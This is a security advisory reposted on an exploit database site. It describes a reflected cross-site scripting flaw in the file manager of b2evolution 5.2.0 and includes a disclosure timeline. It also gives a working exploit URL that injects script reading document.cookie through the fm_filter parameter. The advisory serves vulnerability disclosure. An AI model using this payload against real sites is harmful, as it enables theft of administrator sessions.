[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

CMS b2evolution 5.2.0 Cross Site Scripting Vulnerability

Author
Steffen Rösemann
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-23122
Category
web applications
Date add
15-01-2015
Platform
php
Advisory: Reflecting XSS vulnerability in CMS filemanager of b2evolution v.
5.2.0
Author: Steffen Rösemann
Affected Software: CMS b2evolution v. 5.2.0 (Release-Date: 6th-Dec-2014)
Vendor URL: http://b2evolution.net/
Vendor Status: did not respond to issue
CVE-ID: -

==========================
Vulnerability Description:
==========================

The filemanager of b2evolution v. 5.2.0 is prone to reflecting XSS attacks.

==================
Technical Details:
==================

By appending aribitrary HTML- and/or JavaScriptcode to the "fm_filter"
parameter of the URL where the filemanager functionality of b2eveolution is
located, an attacker could trick an authenticated administrative user to
execute the code.

Filemanager is located here on a common b2evolution installation:

http://
{TARGET}/blogs/admin.php?fm_filter=&actionArray[filter]=Apply&ctrl=files&locale=&blog=1&mode=&ajax_request=0&root=collection_1&path=&fm_mode=&linkctrl=&linkdata=&iframe_name=&fm_hide_dirtree=0&fm_flatmode=&fm_order=&fm_orderasc=

Exploit-Example:

http://
{TARGET}/blogs/admin.php?fm_filter=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&actionArray[filter]=Apply&ctrl=files&locale=&blog=1&mode=&ajax_request=0&root=collection_1&path=&fm_mode=&linkctrl=&linkdata=&iframe_name=&fm_hide_dirtree=0&fm_flatmode=&fm_order=&fm_orderasc=

=========
Solution:
=========

Vendor did not respond and submitted no solution.

====================
Disclosure Timeline:
====================

30-Dec-2014 – found the vulnerability
30-Dec-2014 - informed the developers (incl. announcement to release
technical details on 13th Jan 2015 if there is no response)
30-Dec-2014 – release date of this security advisory [without technical
details]
13-Jan-2015 - vendor did not respond
13-Jan-2015 - release date of this security advisory
13-Jan-2015 - send to lists



========
Credits:
========

Vulnerability found and advisory written by Steffen Rösemann.

===========
References:
===========

[1] http://b2evolution.net/
[2] http://sroesemann.blogspot.de/2014/12/sroeadv-2014-09.html
[3]
http://sroesemann.blogspot.de/2015/01/report-for-advisory-sroeadv-2014-09.html

#  0day.today [2024-12-25]  #